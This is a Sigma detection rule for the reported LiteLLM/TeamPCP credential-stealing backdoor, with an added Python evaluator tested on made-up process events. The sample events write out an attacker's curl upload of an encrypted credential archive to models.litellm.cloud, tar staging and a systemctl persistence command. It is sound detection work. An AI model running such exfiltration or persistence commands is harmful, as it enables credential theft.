LiteLLM / TeamPCP Supply Chain Attack Indicators

Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8). In March 2026, a supply chain attack by the threat actor TeamPCP against the popular open-source LLM framework LiteLLM was discovered: the malicious package harvests credentials from across the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.

Sigma rule

title: LiteLLM / TeamPCP Supply Chain Attack Indicators
id: 36603778-030c-43c4-8cbb-cd3c1d1a80c7
status: experimental
description: |
    Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8).
    In March 2026, a supply chain attack by the threat actor TeamPCP against the popular open-source LLM framework LiteLLM was discovered.
    The malicious package harvests credentials from across the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.
references:
    - https://novasky.io/hunts/hunting-litellm-supply-chain
    - https://www.virustotal.com/gui/file/71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238/
    - https://huskyhacks.io/posts/litellm-cred-stealer/
    - https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-30
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.collection
    - attack.t1560.001
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_pth_package:
        # Execution of .pth file
        Image|contains: '/python3'
        CommandLine|contains|all:
            - "exec(base64.b64decode('aW1wb3J0"
            - "kI2NF9TQ1JJUFQgPSAiYV"
    selection_tar:
        Image|endswith: '/tar'
        CommandLine|contains|all:
            - 'tpcp.tar.gz'
            - 'payload.enc'
            - 'session.key.enc'
    selection_curl:
        Image|endswith: '/curl'
        CommandLine|contains|all:
            - 'models.litellm.cloud'
            - 'X-Filename: tpcp.tar.gz'
    selection_sysmon_service:
        ParentImage|contains: '/python3'
        CommandLine|contains|all:
            - 'systemctl'
            - '--user'
            - 'sysmon'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high
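To see what the four selections actually match on, the following is an added Python evaluator; it is not part of the SigmaHQ rule or any Sigma backend. It re-implements only the semantics this rule needs (the contains and endswith modifiers, the |all modifier, AND within a selection, and the "1 of selection_*" condition) and runs them over constructed Linux process_creation events. The events, their paths and arguments are made up for illustration and the base64 bodies are elided to the two substrings the rule keys on; only the indicator strings are copied from the rule. Sigma string matching is case-insensitive by default, which the evaluator honours.

```python
"""Added example: evaluate the four selections of the LiteLLM / TeamPCP Sigma rule
over constructed Linux process_creation events. Not the rule's own code nor a Sigma
backend; it implements only the semantics the rule needs (contains, endswith, the |all
modifier, AND inside a selection, and the "1 of selection_*" condition). Sigma string
matching is case-insensitive by default, so every comparison is lower-cased."""

# Selections transcribed from the rule: "Field|modifier[|all]" -> list of values
RULE_SELECTIONS = {
    "selection_pth_package": {
        "Image|contains": ["/python3"],
        "CommandLine|contains|all": ["exec(base64.b64decode('aW1wb3J0",
                                     "kI2NF9TQ1JJUFQgPSAiYV"],
    },
    "selection_tar": {
        "Image|endswith": ["/tar"],
        "CommandLine|contains|all": ["tpcp.tar.gz", "payload.enc", "session.key.enc"],
    },
    "selection_curl": {
        "Image|endswith": ["/curl"],
        "CommandLine|contains|all": ["models.litellm.cloud", "X-Filename: tpcp.tar.gz"],
    },
    "selection_sysmon_service": {
        "ParentImage|contains": ["/python3"],
        "CommandLine|contains|all": ["systemctl", "--user", "sysmon"],
    },
}


def _value_matches(actual: str, modifier: str, expected: str) -> bool:
    """One case-insensitive Sigma string comparison."""
    a, e = actual.lower(), expected.lower()
    if modifier == "contains":
        return e in a
    if modifier == "endswith":
        return a.endswith(e)
    return a == e  # no modifier: exact match


def _clause_matches(event: dict, spec: str, values: list) -> bool:
    """Evaluate one 'Field|modifier[|all]: values' clause against an event."""
    field, *modifiers = spec.split("|")
    actual = event.get(field)
    if actual is None:  # a missing field never matches
        return False
    modifier = next((m for m in modifiers if m != "all"), "")
    hits = [_value_matches(actual, modifier, v) for v in values]
    return all(hits) if "all" in modifiers else any(hits)


def matched_selections(event: dict) -> list:
    """Selections whose clauses all match; clauses inside a selection are ANDed."""
    return [name for name, clauses in RULE_SELECTIONS.items()
            if all(_clause_matches(event, s, v) for s, v in clauses.items())]


def rule_fires(event: dict) -> bool:
    """condition: 1 of selection_* -> any single matching selection is enough."""
    return bool(matched_selections(event))


def scan(events: dict) -> dict:
    """Map event label -> matched selections, for every event that fires."""
    return {label: m for label, ev in events.items() if (m := matched_selections(ev))}


# Constructed events (not real telemetry). Paths and arguments are illustrative; the
# base64 bodies are elided to the two substrings the rule keys on.
SAMPLE_EVENTS = {
    "pth_exec": {"Image": "/usr/bin/python3.11", "ParentImage": "/usr/bin/bash",
                 "CommandLine": "python3 -c \"exec(base64.b64decode('aW1wb3J0...kI2NF9TQ1JJUFQgPSAiYV...'))\""},
    "tar_stage": {"Image": "/usr/bin/tar", "ParentImage": "/usr/bin/python3",
                  "CommandLine": "tar -czf /tmp/tpcp.tar.gz payload.enc session.key.enc"},
    "curl_exfil": {"Image": "/usr/bin/curl", "ParentImage": "/usr/bin/python3",
                   "CommandLine": "curl -s -H 'X-Filename: tpcp.tar.gz' --data-binary @/tmp/tpcp.tar.gz https://models.litellm.cloud/"},
    # Same upload with odd casing: still matches because Sigma matching is case-insensitive
    "curl_exfil_upper": {"Image": "/usr/bin/curl", "ParentImage": "/usr/bin/python3",
                         "CommandLine": "curl -s -H 'X-FILENAME: TPCP.TAR.GZ' --data-binary @/tmp/tpcp.tar.gz https://MODELS.LITELLM.CLOUD/"},
    "service_persist": {"Image": "/usr/bin/systemctl", "ParentImage": "/usr/bin/python3",
                        "CommandLine": "systemctl --user enable --now sysmon.service"},
    # Benign look-alikes: wrong tokens, or systemctl spawned by a shell rather than python3
    "benign_tar": {"Image": "/usr/bin/tar", "ParentImage": "/usr/bin/bash",
                   "CommandLine": "tar -czf /backup/etc.tar.gz /etc"},
    "benign_systemctl": {"Image": "/usr/bin/systemctl", "ParentImage": "/usr/bin/bash",
                         "CommandLine": "systemctl --user status sysmon"},
}

if __name__ == "__main__":
    for label, hits in scan(SAMPLE_EVENTS).items():
        print(f"{label}: {', '.join(hits)}")
```

Two properties of the rule are visible in the output. First, selection_sysmon_service only fires when the systemctl call has a python3 parent, so an administrator running systemctl --user from a shell does not trigger it. Second, the tar and curl selections require all of their tokens on one command line; if the staging or upload were split across several invocations, these two selections would not match and detection would rest on the other selections. In a real deployment the Sigma backend, not your own code, generates the case-insensitive query for the target SIEM.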
